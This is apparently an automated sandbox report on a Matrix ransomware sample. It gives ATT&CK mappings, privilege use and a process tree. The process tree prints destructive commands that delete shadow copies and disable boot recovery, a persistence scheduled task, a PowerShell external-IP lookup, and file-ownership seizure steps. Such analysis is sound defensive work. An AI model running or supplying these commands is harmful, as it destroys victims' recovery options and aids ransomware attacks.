File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICSTYLES.DPV	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240175.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DVDHM.POC	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieResume.dotx	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153518.WMF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\#FOX_README#.rtf	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Maputo	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14985_.GIF	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
840	schtasks.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
684	vssadmin.exe
224	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
512	powershell.exe
1684	DhyQfpmw64.exe
1684	DhyQfpmw64.exe
1684	DhyQfpmw64.exe
1464	powershell.exe
1464	powershell.exe
1464	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1684	DhyQfpmw64.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	1684	DhyQfpmw64.exe
Token: SeLoadDriverPrivilege	1684	DhyQfpmw64.exe
Token: SeBackupPrivilege	1584	vssvc.exe
Token: SeRestorePrivilege	1584	vssvc.exe
Token: SeAuditPrivilege	1584	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1488	WMIC.exe
Token: SeSecurityPrivilege	1488	WMIC.exe
Token: SeTakeOwnershipPrivilege	1488	WMIC.exe
Token: SeLoadDriverPrivilege	1488	WMIC.exe
Token: SeSystemProfilePrivilege	1488	WMIC.exe
Token: SeSystemtimePrivilege	1488	WMIC.exe
Token: SeProfSingleProcessPrivilege	1488	WMIC.exe
Token: SeIncBasePriorityPrivilege	1488	WMIC.exe
Token: SeCreatePagefilePrivilege	1488	WMIC.exe
Token: SeBackupPrivilege	1488	WMIC.exe
Token: SeRestorePrivilege	1488	WMIC.exe
Token: SeShutdownPrivilege	1488	WMIC.exe
Token: SeDebugPrivilege	1488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1488	WMIC.exe
Token: SeRemoteShutdownPrivilege	1488	WMIC.exe
Token: SeUndockPrivilege	1488	WMIC.exe
Token: SeManageVolumePrivilege	1488	WMIC.exe
Token: 33	1488	WMIC.exe
Token: 34	1488	WMIC.exe
Token: 35	1488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1488	WMIC.exe
Token: SeSecurityPrivilege	1488	WMIC.exe
Token: SeTakeOwnershipPrivilege	1488	WMIC.exe
Token: SeLoadDriverPrivilege	1488	WMIC.exe
Token: SeSystemProfilePrivilege	1488	WMIC.exe
Token: SeSystemtimePrivilege	1488	WMIC.exe
Token: SeProfSingleProcessPrivilege	1488	WMIC.exe
Token: SeIncBasePriorityPrivilege	1488	WMIC.exe
Token: SeCreatePagefilePrivilege	1488	WMIC.exe
Token: SeBackupPrivilege	1488	WMIC.exe
Token: SeRestorePrivilege	1488	WMIC.exe
Token: SeShutdownPrivilege	1488	WMIC.exe
Token: SeDebugPrivilege	1488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1488	WMIC.exe
Token: SeRemoteShutdownPrivilege	1488	WMIC.exe
Token: SeUndockPrivilege	1488	WMIC.exe
Token: SeManageVolumePrivilege	1488	WMIC.exe
Token: 33	1488	WMIC.exe
Token: 34	1488	WMIC.exe
Token: 35	1488	WMIC.exe
Token: SeDebugPrivilege	1464	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 756 wrote to memory of 1056	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	28
PID 756 wrote to memory of 1056	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	28
PID 756 wrote to memory of 1056	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	28
PID 756 wrote to memory of 1056	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	28
PID 756 wrote to memory of 1624	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	30
PID 756 wrote to memory of 1624	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	30
PID 756 wrote to memory of 1624	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	30
PID 756 wrote to memory of 1624	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	30
PID 756 wrote to memory of 1976	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	34
PID 756 wrote to memory of 1976	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	34
PID 756 wrote to memory of 1976	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	34
PID 756 wrote to memory of 1976	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	34
PID 1976 wrote to memory of 512	1976	cmd.exe	36
PID 1976 wrote to memory of 512	1976	cmd.exe	36
PID 1976 wrote to memory of 512	1976	cmd.exe	36
PID 1976 wrote to memory of 512	1976	cmd.exe	36
PID 756 wrote to memory of 1056	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	37
PID 756 wrote to memory of 1056	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	37
PID 756 wrote to memory of 1056	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	37
PID 756 wrote to memory of 1056	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	37
PID 756 wrote to memory of 936	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	40
PID 756 wrote to memory of 936	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	40
PID 756 wrote to memory of 936	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	40
PID 756 wrote to memory of 936	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	40
PID 936 wrote to memory of 1232	936	cmd.exe	41
PID 936 wrote to memory of 1232	936	cmd.exe	41
PID 936 wrote to memory of 1232	936	cmd.exe	41
PID 936 wrote to memory of 1232	936	cmd.exe	41
PID 1056 wrote to memory of 436	1056	cmd.exe	42
PID 1056 wrote to memory of 436	1056	cmd.exe	42
PID 1056 wrote to memory of 436	1056	cmd.exe	42
PID 1056 wrote to memory of 436	1056	cmd.exe	42
PID 1056 wrote to memory of 1280	1056	cmd.exe	43
PID 1056 wrote to memory of 1280	1056	cmd.exe	43
PID 1056 wrote to memory of 1280	1056	cmd.exe	43
PID 1056 wrote to memory of 1280	1056	cmd.exe	43
PID 756 wrote to memory of 1716	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	44
PID 756 wrote to memory of 1716	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	44
PID 756 wrote to memory of 1716	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	44
PID 756 wrote to memory of 1716	756	72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe	44
PID 1716 wrote to memory of 456	1716	cmd.exe	46
PID 1716 wrote to memory of 456	1716	cmd.exe	46
PID 1716 wrote to memory of 456	1716	cmd.exe	46
PID 1716 wrote to memory of 456	1716	cmd.exe	46
PID 1056 wrote to memory of 388	1056	cmd.exe	47
PID 1056 wrote to memory of 388	1056	cmd.exe	47
PID 1056 wrote to memory of 388	1056	cmd.exe	47
PID 1056 wrote to memory of 388	1056	cmd.exe	47
PID 1716 wrote to memory of 1124	1716	cmd.exe	48
PID 1716 wrote to memory of 1124	1716	cmd.exe	48
PID 1716 wrote to memory of 1124	1716	cmd.exe	48
PID 1716 wrote to memory of 1124	1716	cmd.exe	48
PID 1716 wrote to memory of 1784	1716	cmd.exe	49
PID 1716 wrote to memory of 1784	1716	cmd.exe	49
PID 1716 wrote to memory of 1784	1716	cmd.exe	49
PID 1716 wrote to memory of 1784	1716	cmd.exe	49
PID 1716 wrote to memory of 1600	1716	cmd.exe	50
PID 1716 wrote to memory of 1600	1716	cmd.exe	50
PID 1716 wrote to memory of 1600	1716	cmd.exe	50
PID 1716 wrote to memory of 1600	1716	cmd.exe	50
PID 1600 wrote to memory of 1604	1600	cmd.exe	51
PID 1600 wrote to memory of 1604	1600	cmd.exe	51
PID 1600 wrote to memory of 1604	1600	cmd.exe	51
PID 1600 wrote to memory of 1604	1600	cmd.exe	51

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
456	attrib.exe

C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
"C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:756
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe" "C:\Users\Admin\AppData\Local\Temp\NWSO8eY2.exe"
  2⤵
  PID:1056
- C:\Users\Admin\AppData\Local\Temp\NWSO8eY2.exe
  "C:\Users\Admin\AppData\Local\Temp\NWSO8eY2.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ma6TWcbo.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:512
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\3STAYjlo.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\3STAYjlo.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:436
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:388
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\i7qsm92W.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:936
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\i7qsm92W.vbs"
    3⤵
    PID:1232
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\GCmejp5M.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:1464
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\GCmejp5M.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:840
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:112
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\w2KPNC2M.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1716
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Views/modifies file attributes
    PID:456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:1784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c DhyQfpmw.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\DhyQfpmw.exe
      DhyQfpmw.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1604
    - - C:\Users\Admin\AppData\Local\Temp\DhyQfpmw64.exe
        
        DhyQfpmw.exe -accepteula "DefaultID.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684

C:\Windows\system32\taskeng.exe
taskeng.exe {9201C9EF-350D-401D-9F9A-1DD3A7BA142A} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]
1⤵
PID:960
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\GCmejp5M.bat"
  2⤵
  PID:1372
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1464
  - - C:\Windows\system32\vssadmin.exe
      "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:224
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:892
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1280
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1488

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/512-63-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/512-62-0x0000000002500000-0x000000000314A000-memory.dmp

Filesize
12.3MB

Download
memory/512-61-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/756-54-0x0000000075781000-0x0000000075783000-memory.dmp

Filesize
8KB

Download
memory/1464-75-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp

Filesize
8KB

Download
memory/1464-76-0x000007FEF2BB0000-0x000007FEF370D000-memory.dmp

Filesize
11.4MB

Download
memory/1464-77-0x000000001B810000-0x000000001BB0F000-memory.dmp

Filesize
3.0MB

Download
memory/1464-79-0x0000000002BDB000-0x0000000002BFA000-memory.dmp

Filesize
124KB

Download
memory/1464-80-0x0000000002BD0000-0x0000000002BD2000-memory.dmp

Filesize
8KB

Download
memory/1464-78-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

Filesize
9.6MB

Download
memory/1464-81-0x000007FEF50E0000-0x000007FEF5A7D000-memory.dmp

Filesize
9.6MB

Download
memory/1464-82-0x0000000002BD2000-0x0000000002BD4000-memory.dmp

Filesize
8KB

Download
memory/1464-83-0x0000000002BD4000-0x0000000002BD7000-memory.dmp

Filesize
12KB

Download